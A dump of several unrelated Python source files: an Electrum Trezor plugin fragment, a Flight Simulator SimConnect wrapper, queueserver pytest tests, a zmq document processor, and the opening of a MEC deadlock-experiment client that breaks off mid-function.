signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'TrezorKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_trezor_input_script_type(txin.script_type)
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n = full_path
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'TrezorKeyStore'):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
t.inputs = self.tx_inputs(tx)
t.bin_outputs = [
TxOutputBinType(amount=o.value, script_pubkey=o.scriptpubkey)
for o in tx.outputs()
]
return t
|
SimConnect.py
|
from ctypes import *
from ctypes.wintypes import *
import logging
import time
from .Enum import *
from .Constants import *
from .Attributes import *
import os
import threading
_library_path = os.path.abspath(__file__).replace(".py", ".dll")
LOGGER = logging.getLogger(__name__)
def millis():
return int(round(time.time() * 1000))
class SimConnect:
def IsHR(self, hr, value):
_hr = ctypes.HRESULT(hr)
return ctypes.c_ulong(_hr.value).value == value
def handle_id_event(self, event):
uEventID = event.uEventID
if uEventID == self.dll.EventID.EVENT_SIM_START:
LOGGER.info("SIM START")
self.running = True
if uEventID == self.dll.EventID.EVENT_SIM_STOP:
LOGGER.info("SIM Stop")
self.running = False
        # Unknown why these events are not always received
if uEventID == self.dll.EventID.EVENT_SIM_PAUSED:
LOGGER.info("SIM Paused")
self.paused = True
if uEventID == self.dll.EventID.EVENT_SIM_UNPAUSED:
LOGGER.info("SIM Unpaused")
self.paused = False
def handle_simobject_event(self, ObjData):
dwRequestID = ObjData.dwRequestID
if dwRequestID in self.Requests:
_request = self.Requests[dwRequestID]
rtype = _request.definitions[0][1].decode()
if 'string' in rtype.lower():
pS = cast(ObjData.dwData, c_char_p)
_request.outData = pS.value
else:
_request.outData = cast(
ObjData.dwData, POINTER(c_double * len(_request.definitions))
).contents[0]
else:
            LOGGER.warning("Event ID: %d not handled.", dwRequestID)
def handle_exception_event(self, exc):
_exception = SIMCONNECT_EXCEPTION(exc.dwException).name
_unsendid = exc.UNKNOWN_SENDID
_sendid = exc.dwSendID
_unindex = exc.UNKNOWN_INDEX
_index = exc.dwIndex
# request exceptions
for _reqin in self.Requests:
_request = self.Requests[_reqin]
if _request.LastID == _unsendid:
LOGGER.warn("%s: in %s" % (_exception, _request.definitions[0]))
return
LOGGER.warn(_exception)
def handle_state_event(self, pData):
print("I:", pData.dwInteger, "F:", pData.fFloat, "S:", pData.szString)
# TODO: update callbackfunction to expand functions.
def my_dispatch_proc(self, pData, cbData, pContext):
# print("my_dispatch_proc")
dwID = pData.contents.dwID
if dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_EVENT:
evt = cast(pData, POINTER(SIMCONNECT_RECV_EVENT)).contents
self.handle_id_event(evt)
elif dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_SYSTEM_STATE:
state = cast(pData, POINTER(SIMCONNECT_RECV_SYSTEM_STATE)).contents
self.handle_state_event(state)
elif dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_SIMOBJECT_DATA_BYTYPE:
pObjData = cast(
pData, POINTER(SIMCONNECT_RECV_SIMOBJECT_DATA_BYTYPE)
).contents
self.handle_simobject_event(pObjData)
elif dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_OPEN:
LOGGER.info("SIM OPEN")
self.ok = True
elif dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_EXCEPTION:
exc = cast(pData, POINTER(SIMCONNECT_RECV_EXCEPTION)).contents
self.handle_exception_event(exc)
elif (dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_AIRPORT_LIST) or (
dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_WAYPOINT_LIST) or (
dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_NDB_LIST) or (
dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_VOR_LIST):
pObjData = cast(
pData, POINTER(SIMCONNECT_RECV_FACILITIES_LIST)
).contents
dwRequestID = pObjData.dwRequestID
            for facility in self.Facilities:
                if dwRequestID == facility.REQUEST_ID.value:
                    facility.parent.dump(pData)
                    facility.dump(pData)
elif dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_QUIT:
self.quit = 1
else:
LOGGER.debug("Received:", SIMCONNECT_RECV_ID(dwID))
return
def __init__(self, auto_connect=True, library_path=_library_path):
self.Requests = {}
self.Facilities = []
self.dll = SimConnectDll(library_path)
self.hSimConnect = HANDLE()
self.quit = 0
self.ok = False
self.running = False
self.paused = False
self.DEFINITION_POS = None
self.DEFINITION_WAYPOINT = None
self.my_dispatch_proc_rd = self.dll.DispatchProc(self.my_dispatch_proc)
if auto_connect:
self.connect()
def connect(self):
try:
err = self.dll.Open(
byref(self.hSimConnect), LPCSTR(b"Request Data"), None, 0, 0, 0
)
if self.IsHR(err, 0):
LOGGER.debug("Connected to Flight Simulator!")
# Request an event when the simulation starts
# The user is in control of the aircraft
self.dll.SubscribeToSystemEvent(
self.hSimConnect, self.dll.EventID.EVENT_SIM_START, b"SimStart"
)
# The user is navigating the UI.
self.dll.SubscribeToSystemEvent(
self.hSimConnect, self.dll.EventID.EVENT_SIM_STOP, b"SimStop"
)
# Request a notification when the flight is paused
self.dll.SubscribeToSystemEvent(
self.hSimConnect, self.dll.EventID.EVENT_SIM_PAUSED, b"Paused"
)
# Request a notification when the flight is un-paused.
self.dll.SubscribeToSystemEvent(
self.hSimConnect, self.dll.EventID.EVENT_SIM_UNPAUSED, b"Unpaused"
)
self.timerThread = threading.Thread(target=self._run)
self.timerThread.daemon = True
self.timerThread.start()
while self.ok is False:
pass
except OSError:
LOGGER.debug("Did not find Flight Simulator running.")
raise ConnectionError("Did not find Flight Simulator running.")
def _run(self):
while self.quit == 0:
self.dll.CallDispatch(self.hSimConnect, self.my_dispatch_proc_rd, None)
time.sleep(.001)
def exit(self):
self.quit = 1
self.timerThread.join()
self.dll.Close(self.hSimConnect)
def map_to_sim_event(self, name):
for m in self.dll.EventID:
if name.decode() == m.name:
LOGGER.debug("Already have event: ", m)
return m
names = [m.name for m in self.dll.EventID] + [name.decode()]
self.dll.EventID = Enum(self.dll.EventID.__name__, names)
evnt = list(self.dll.EventID)[-1]
err = self.dll.MapClientEventToSimEvent(self.hSimConnect, evnt.value, name)
if self.IsHR(err, 0):
return evnt
else:
LOGGER.error("Error: MapToSimEvent")
return None
def add_to_notification_group(self, group, evnt, bMaskable=False):
self.dll.AddClientEventToNotificationGroup(
self.hSimConnect, group, evnt, bMaskable
)
def request_data(self, _Request):
_Request.outData = None
self.dll.RequestDataOnSimObjectType(
self.hSimConnect,
_Request.DATA_REQUEST_ID.value,
_Request.DATA_DEFINITION_ID.value,
0,
SIMCONNECT_SIMOBJECT_TYPE.SIMCONNECT_SIMOBJECT_TYPE_USER,
)
temp = DWORD(0)
self.dll.GetLastSentPacketID(self.hSimConnect, temp)
_Request.LastID = temp.value
def set_data(self, _Request):
rtype = _Request.definitions[0][1].decode()
if 'string' in rtype.lower():
pyarr = bytearray(_Request.outData)
dataarray = (ctypes.c_char * len(pyarr))(*pyarr)
else:
pyarr = list([_Request.outData])
dataarray = (ctypes.c_double * len(pyarr))(*pyarr)
pObjData = cast(
dataarray, c_void_p
)
err = self.dll.SetDataOnSimObject(
self.hSimConnect,
_Request.DATA_DEFINITION_ID.value,
SIMCONNECT_SIMOBJECT_TYPE.SIMCONNECT_SIMOBJECT_TYPE_USER,
0,
0,
sizeof(ctypes.c_double) * len(pyarr),
pObjData
)
if self.IsHR(err, 0):
# LOGGER.debug("Request Sent")
return True
else:
return False
def get_data(self, _Request):
self.request_data(_Request)
# self.run()
attemps = 0
while _Request.outData is None and attemps < _Request.attemps:
# self.run()
time.sleep(.001)
attemps += 1
if _Request.outData is None:
return False
return True
def send_event(self, evnt, data=DWORD(0)):
err = self.dll.TransmitClientEvent(
self.hSimConnect,
SIMCONNECT_OBJECT_ID_USER,
evnt.value,
data,
SIMCONNECT_GROUP_PRIORITY_HIGHEST,
DWORD(16),
)
if self.IsHR(err, 0):
# LOGGER.debug("Event Sent")
return True
else:
return False
def new_def_id(self):
_name = "Definition" + str(len(list(self.dll.DATA_DEFINITION_ID)))
names = [m.name for m in self.dll.DATA_DEFINITION_ID] + [_name]
self.dll.DATA_DEFINITION_ID = Enum(self.dll.DATA_DEFINITION_ID.__name__, names)
DEFINITION_ID = list(self.dll.DATA_DEFINITION_ID)[-1]
return DEFINITION_ID
def new_request_id(self):
name = "Request" + str(len(self.dll.DATA_REQUEST_ID))
names = [m.name for m in self.dll.DATA_REQUEST_ID] + [name]
self.dll.DATA_REQUEST_ID = Enum(self.dll.DATA_REQUEST_ID.__name__, names)
REQUEST_ID = list(self.dll.DATA_REQUEST_ID)[-1]
return REQUEST_ID
def add_waypoints(self, _waypointlist):
if self.DEFINITION_WAYPOINT is None:
self.DEFINITION_WAYPOINT = self.new_def_id()
err = self.dll.AddToDataDefinition(
self.hSimConnect,
self.DEFINITION_WAYPOINT.value,
b'AI WAYPOINT LIST',
b'number',
SIMCONNECT_DATATYPE.SIMCONNECT_DATATYPE_WAYPOINT,
0,
SIMCONNECT_UNUSED,
)
pyarr = []
for waypt in _waypointlist:
for e in waypt._fields_:
pyarr.append(getattr(waypt, e[0]))
dataarray = (ctypes.c_double * len(pyarr))(*pyarr)
pObjData = cast(
dataarray, c_void_p
)
sx = int(sizeof(ctypes.c_double) * (len(pyarr) / len(_waypointlist)))
hr = self.dll.SetDataOnSimObject(
self.hSimConnect,
self.DEFINITION_WAYPOINT.value,
SIMCONNECT_OBJECT_ID_USER,
0,
len(_waypointlist),
sx,
pObjData
)
        if self.IsHR(hr, 0):
return True
else:
return False
def set_pos(
self,
_Altitude,
_Latitude,
_Longitude,
_Airspeed,
_Pitch=0.0,
_Bank=0.0,
_Heading=0,
_OnGround=0,
):
Init = SIMCONNECT_DATA_INITPOSITION()
Init.Altitude = _Altitude
Init.Latitude = _Latitude
Init.Longitude = _Longitude
Init.Pitch = _Pitch
Init.Bank = _Bank
Init.Heading = _Heading
Init.OnGround = _OnGround
Init.Airspeed = _Airspeed
if self.DEFINITION_POS is None:
            self.DEFINITION_POS = self.new_def_id()
err = self.dll.AddToDataDefinition(
self.hSimConnect,
self.DEFINITION_POS.value,
b'Initial Position',
b'',
SIMCONNECT_DATATYPE.SIMCONNECT_DATATYPE_INITPOSITION,
0,
SIMCONNECT_UNUSED,
)
hr = self.dll.SetDataOnSimObject(
self.hSimConnect,
self.DEFINITION_POS.value,
SIMCONNECT_OBJECT_ID_USER,
0,
0,
sizeof(Init),
pointer(Init)
)
if self.IsHR(hr, 0):
return True
else:
return False
def load_flight(self, flt_path):
hr = self.dll.FlightLoad(self.hSimConnect, flt_path.encode())
if self.IsHR(hr, 0):
return True
else:
return False
def load_flight_plan(self, pln_path):
hr = self.dll.FlightPlanLoad(self.hSimConnect, pln_path.encode())
if self.IsHR(hr, 0):
return True
else:
return False
def save_flight(self, flt_path, flt_title, flt_description):
hr = self.dll.FlightSave(self.hSimConnect, flt_path.encode(), flt_title.encode(), flt_description.encode(), 0)
if self.IsHR(hr, 0):
return True
else:
return False
def get_paused(self):
hr = self.dll.RequestSystemState(
self.hSimConnect,
self.dll.EventID.EVENT_SIM_PAUSED,
b"Sim"
)
# not working
# def dic_to_flight(self, dic):
# data_folder = os.path.dirname(os.path.realpath(__file__))
# file_to_open = os.path.join(data_folder, "TEMP.FLT")
# if os.path.isfile(file_to_open):
# os.remove(file_to_open)
# with open(file_to_open, "w") as tempfile:
# for root in dic:
# tempfile.write("\n[%s]\n" % root)
# for member in dic[root]:
# tempfile.write("%s=%s\n" % (member, dic[root][member]))
# if os.path.isfile(file_to_open):
# self.load_flight(file_to_open)
def flight_to_dic(self):
data_folder = os.path.dirname(os.path.realpath(__file__))
file_to_open = os.path.join(data_folder, "TEMP.FLT")
if os.path.isfile(file_to_open):
os.remove(file_to_open)
self.save_flight(file_to_open, "Flight", "Supper Cool flight")
while not os.path.isfile(file_to_open):
pass
time.sleep(0.5)
dic = {}
index = ""
with open(file_to_open, "r") as tempfile:
for line in tempfile.readlines():
if line[0] == '[':
index = line[1:-2]
dic[index] = {}
else:
if index != "" and line != '\n':
temp = line.split("=")
dic[index][temp[0]] = temp[1].strip()
os.remove(file_to_open)
return dic
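# Illustrative usage sketch (not part of the original module; the simulator
# event name below is one of the SDK's own Event IDs and is assumed here):
#
#   sm = SimConnect()                           # opens the handle and starts the _run() dispatch thread
#   evt = sm.map_to_sim_event(b"PAUSE_TOGGLE")  # map a named sim event to a client event id
#   sm.send_event(evt)                          # transmit it to the user aircraft
#   sm.exit()                                   # stop the dispatch loop and close the handle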
|
test_manager_options.py
|
import pytest
import shutil
import os
import glob
import subprocess
import time as ttime
import multiprocessing
from bluesky.callbacks.zmq import RemoteDispatcher
from bluesky_queueserver.manager.profile_ops import gen_list_of_plans_and_devices
from bluesky_queueserver.manager.comms import zmq_single_request
from ._common import (
copy_default_profile_collection,
append_code_to_last_startup_file,
wait_for_condition,
condition_environment_created,
condition_queue_processing_finished,
condition_environment_closed,
)
from ._common import re_manager_cmd # noqa: F401
# User name and user group name used throughout most of the tests.
_user, _user_group = "Testing Script", "admin"
_plan1 = {"name": "count", "args": [["det1", "det2"]]}
_sample_plan1 = """
def simple_sample_plan():
'''
Simple plan for tests.
'''
yield from count([det1, det2])
"""
# fmt: off
@pytest.mark.parametrize("option", ["startup_dir", "profile", "multiple"])
# fmt: on
def test_manager_options_startup_profile(re_manager_cmd, tmp_path, monkeypatch, option): # noqa: F811
pc_path = copy_default_profile_collection(tmp_path)
# Add extra plan. The original set of startup files will not contain this plan.
append_code_to_last_startup_file(pc_path, additional_code=_sample_plan1)
# Generate the new list of allowed plans and devices and reload them
gen_list_of_plans_and_devices(startup_dir=pc_path, file_dir=pc_path, overwrite=True)
# Start manager
if option == "startup_dir":
re_manager_cmd(["--startup-dir", pc_path])
elif option == "profile":
# This option is more complicated: we want to recreate the structure of IPython startup
# directory: <some root dir>/profile_<profile_name>/startup.
root_dir = os.path.split(pc_path)[0]
monkeypatch.setenv("IPYTHONDIR", root_dir)
profile_name = "testing"
startup_path = os.path.join(root_dir, f"profile_{profile_name}", "startup")
os.makedirs(startup_path)
file_pattern = os.path.join(pc_path, "*")
for fl_path in glob.glob(file_pattern):
shutil.move(fl_path, startup_path)
os.rmdir(pc_path)
# We pass only profile name as a parameter.
re_manager_cmd(["--startup-profile", profile_name])
elif option == "multiple":
# Expected to fail if multiple options are selected.
with pytest.raises(TimeoutError, match="RE Manager failed to start"):
re_manager_cmd(["--startup-dir", pc_path, "--startup-profile", "some_name"])
return
else:
assert False, f"Unknown option '{option}'"
# Open the environment (make sure that the environment loads)
resp1, _ = zmq_single_request("environment_open")
assert resp1["success"] is True
assert wait_for_condition(time=10, condition=condition_environment_created)
# Add the plan to the queue (will fail if incorrect environment is loaded)
plan = {"name": "simple_sample_plan"}
params = {"plan": plan, "user": _user, "user_group": _user_group}
resp2, _ = zmq_single_request("queue_item_add", params)
assert resp2["success"] is True, f"resp={resp2}"
# Start the queue
resp3, _ = zmq_single_request("queue_start")
assert resp3["success"] is True
assert wait_for_condition(time=10, condition=condition_queue_processing_finished)
# Make sure that the plan was executed
resp4, _ = zmq_single_request("status")
assert resp4["items_in_queue"] == 0
assert resp4["items_in_history"] == 1
# Close the environment
resp5, _ = zmq_single_request("environment_close")
assert resp5["success"] is True, f"resp={resp5}"
assert wait_for_condition(time=5, condition=condition_environment_closed)
monkeypatch.setenv("IPYTHONDIR", "abc")
@pytest.fixture
def zmq_proxy():
cmd = ["bluesky-0MQ-proxy", "5567", "5568"]
p = subprocess.Popen(cmd, universal_newlines=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
yield
p.kill()
@pytest.fixture
def zmq_dispatcher():
# The following code was mostly borrowed from 'bluesky.tests.test_zmq.py' (test_zmq_no_RE)
def make_and_start_dispatcher(queue):
def put_in_queue(name, doc):
print("putting ", name, "in queue")
queue.put((name, doc))
d = RemoteDispatcher("127.0.0.1:5568")
d.subscribe(put_in_queue)
print("REMOTE IS READY TO START")
d.loop.call_later(9, d.stop)
d.start()
queue = multiprocessing.Queue()
dispatcher_proc = multiprocessing.Process(target=make_and_start_dispatcher, daemon=True, args=(queue,))
dispatcher_proc.start()
ttime.sleep(2) # As above, give this plenty of time to start.
yield queue
dispatcher_proc.terminate()
dispatcher_proc.join()
def test_manager_acq_with_0MQ_proxy(re_manager_cmd, zmq_proxy, zmq_dispatcher): # noqa: F811
re_manager_cmd(["--zmq-data-proxy-addr", "localhost:5567"])
# Open the environment (make sure that the environment loads)
resp1, _ = zmq_single_request("environment_open")
assert resp1["success"] is True
assert wait_for_condition(time=10, condition=condition_environment_created)
# Add the plan to the queue (will fail if incorrect environment is loaded)
params = {"plan": _plan1, "user": _user, "user_group": _user_group}
resp2, _ = zmq_single_request("queue_item_add", params)
assert resp2["success"] is True, f"resp={resp2}"
# Start the queue
resp3, _ = zmq_single_request("queue_start")
assert resp3["success"] is True
assert wait_for_condition(time=10, condition=condition_queue_processing_finished)
# Make sure that the plan was executed
resp4, _ = zmq_single_request("status")
assert resp4["items_in_queue"] == 0
assert resp4["items_in_history"] == 1
# Close the environment
resp5, _ = zmq_single_request("environment_close")
assert resp5["success"] is True, f"resp={resp5}"
assert wait_for_condition(time=5, condition=condition_environment_closed)
# Test if the data was delivered to the consumer.
# Simple test: check if 'start' and 'stop' documents were delivered.
queue = zmq_dispatcher
remote_accumulator = []
while not queue.empty(): # Since queue is used by one process at a time, queue.empty() should work reliably
remote_accumulator.append(queue.get(timeout=2))
assert len(remote_accumulator) >= 2
assert remote_accumulator[0][0] == "start" # Start document
assert remote_accumulator[-1][0] == "stop" # Stop document
|
processing.py
|
# vim: set et nosi ai ts=2 sts=2 sw=2:
# coding: utf-8
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import io
import sys
import threading
from schwa.dr import Reader, Writer
from six.moves import xrange
try:
import zmq
except ImportError:
zmq = None
def stream_coroutine(istream, ostream, doc_class=None, automagic=False):
reader = Reader(istream, doc_class, automagic)
writer = Writer(ostream, reader.doc_schema)
for doc in reader:
res = yield(doc)
writer.write(res or doc)
def zmq_coroutine(context, dealer_url, doc_class=None, automagic=False):
# FIXME: reduce overhead of reader/writer creation
ostream = io.BytesIO()
socket = context.socket(zmq.REP)
socket.connect(dealer_url)
while True:
msg = socket.recv()
istream = io.BytesIO(msg)
istream.seek(0)
reader = Reader(istream, doc_class, automagic)
writer = Writer(ostream, reader.doc_schema)
for doc in reader:
res = yield(doc)
writer.write(res or doc)
ostream.seek(0)
socket.send(ostream.getvalue())
ostream.truncate(0)
arg_parser = argparse.ArgumentParser(add_help=False)
if zmq:
_megroup = arg_parser.add_mutually_exclusive_group()
_megroup.add_argument('--serve', dest='serve_url', metavar='ADDRESS', default=None, help='Serve from the specified address, e.g. tcp://*:7300')
_megroup.add_argument('--worker', dest='worker_url', metavar='ADDRESS', default=None, help='Acquire work from the specified address')
arg_parser.add_argument('--nthreads', default=1, type=int, help='In --serve or --worker mode, how many worker threads to provide (default: %(default)s)')
def run_processor(process, args, doc_class=None, automagic=False, dealer_url='inproc://workers'):
if any(getattr(args, a, None) for a in ('serve_url', 'worker_url')):
context = zmq.Context(1)
if args.serve_url:
clients = context.socket(zmq.ROUTER)
clients.bind(args.serve_url)
workers = context.socket(zmq.DEALER)
workers.bind(dealer_url)
else:
dealer_url = args.worker_url
run = lambda: process(zmq_coroutine(context, dealer_url, doc_class, automagic))
threads = [threading.Thread(target=run) for i in xrange(args.nthreads)]
for thread in threads:
thread.start()
if args.serve_url:
zmq.device(zmq.QUEUE, clients, workers)
else:
process(stream_coroutine(sys.stdin, sys.stdout, doc_class, automagic))
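# Illustrative sketch (not part of the original module; `Doc` and the
# per-document work are hypothetical). `process` receives the coroutine built
# above: iterating it yields one document at a time, and mutating the document
# in place is enough, since the coroutine writes the (possibly modified)
# document back when it is resumed for the next item.
#
#   def my_process(coro):
#       for doc in coro:
#           pass  # hypothetical per-document work, mutating `doc` in place
#
#   if __name__ == '__main__':
#       run_processor(my_process, arg_parser.parse_args(), doc_class=Doc, automagic=True)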
|
client_agent.py
|
#!/usr/bin/env python3
import matplotlib
import socket
import os
import ast
import struct
import random as r
import time
import datetime as dt
import subprocess as sp
import paho.mqtt.client as mqtt
import matplotlib.pyplot as plt
from drawnow import *
import smtplib
import config
import pickle
import algorithms.data_homo as homo
import algorithms.data_hetero as hetero
from threading import Thread
import threading
matplotlib.use('TkAgg')
port = 65000 # The port used by the server
shared_resource_lock = threading.Lock()
# hosts = {} # {hostname: ip}
multicast_group = '224.3.29.71'
server_address = ('', 10000)
record = []  # [({tasks}, {waiting time}), hostname]: records each task list, its execution/waiting times, and the host it was sent to
run = 1
# Create the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock.bind(server_address)
# Tell the operating system to add the socket to the multi-cast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
'''
ax.annotate('local max', xy=(2, 1), xytext=(3, 1.5),
arrowprops=dict(facecolor='black', shrink=0.05),
)
'''
thread_record = []
task_record = {} # records tasks start time and finish time {seq_no:{task:[duration, start_time,finish_time]}}
# task naming idea: client-id_task-no_task-id, e.g. client id = 11, task no => sequence no, task id => t1
tasks_executed_on_time = 0
tasks_not_executed_on_time = 0
timely_ = {'local': 0, 'mec': 0, 'cloud': 0}
untimely_ = {'local': 0, 'mec': 0, 'cloud': 0}
filename = {2: 'rms+bankers',
3: 'edf+bankers',
7: 'rms+wound_wait',
10: 'rms+wait_die',
12: 'edf+wound_wait',
16: 'edf+wait_die'}
plt.ion()
fig = plt.figure(frameon=True)
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(223)
ax3 = fig.add_subplot(224)
def auto_value(no):
if no < 5:
return no
elif no < 10:
return no - 3
elif no < 50:
return no - 6
elif no < 150:
return no - 30
elif no < 800:
return no - 70
elif no < 2000:
return no - 200
else:
return no - 400
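# e.g. auto_value(120) -> 90; used below to nudge the y-position of the
# in-plot summary text so it sits slightly below the bar height.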
def plot_performance():
name = ['Timely', 'Untimely']
ypos = ([0, 1])
total = tasks_executed_on_time + tasks_not_executed_on_time
if tasks_executed_on_time > 0:
timely = round((tasks_executed_on_time / total) * 100, 2)
else:
timely = 0
if tasks_not_executed_on_time > 0:
untimely = round((tasks_not_executed_on_time / total) * 100, 2)
else:
untimely = 0
values = [tasks_executed_on_time, tasks_not_executed_on_time]
ax1.set_xticks(ypos)
ax1.set_xticklabels(name)
ax1.bar(ypos, values, align='center', color=['g', 'm'], alpha=0.5)
ax1.set_title('Task execution Time record')
    dis = 'Seq: {}\nTotal Tasks: {}\nSplit Tasks: {}'.format(seq, total, total_split_task)
# ax1.annotate(dis, xy=(2, 1), xytext=(3, 1.5))
ax1.text(1, auto_value(tasks_executed_on_time), dis, size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.7, 0.7), fc=(1., 0.8, 0.8), ))
ax1.text(-0.1, tasks_executed_on_time, '{}, {}%'.format(tasks_executed_on_time, timely), size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
ax1.text(0.99, tasks_not_executed_on_time, '{}, {}%'.format(tasks_not_executed_on_time, untimely),
size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
plt.subplot(ax1)
d = [[timely_, ax2, 'Timely Details'], [untimely_, ax3, 'UnTimely Details']]
for info in d:
plot_details(ax=info[1], data=info[0], title=info[2])
fig.suptitle('MEC Performance During Deadlock Experiment')
def plot_details(ax, data, title):
name = ['Local', 'MEC', 'Cloud']
ypos = ([0, 1, 2])
data_per = {}
total = 0
for i in data:
total += data[i]
for i in data:
if data[i] == 0:
data_per[i] = 0
else:
data_per[i] = round((data[i] / total) * 100, 2)
values = list(data.values())
ax.set_xticks(ypos)
ax.set_xticklabels(name)
ax.bar(ypos, values, align='center', color=['g', 'b', 'r'], alpha=0.5)
ax.set_title(title)
g = -0.1
for i in data:
ax.text(g, data[i], '{}, {}%'.format(data[i], data_per[i]), size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
g += 1
plt.subplot(ax)
def get_time():
_time_ = dt.datetime.utcnow()
return _time_
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect_task(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(task_topic, qos=0)
u_time = {'local': [], 'mec': [], 'cloud': []}
t_time = {'local': [], 'mec': [], 'cloud': []}
# Callback Function on Receiving the Subscribed Topic/Message
def on_receive_task(message_client, userdata, msg):
global tasks_executed_on_time
global tasks_not_executed_on_time
# print the message received from the subscribed topic
data = str(msg.payload, 'utf-8')
received_task = ast.literal_eval(data) # {task_id: ['2020', '04', '09', '14', '38', '39', '627060', '<mec>']}
for i in received_task:
tk = '.'.join(i.split('.')[:4])
# print('tk: {}'.format(tk))
seq_no = int(tk.split('.')[3]) # naming tasks = task_id.node_id.client_id.sequence_no =>t2.110.170.10
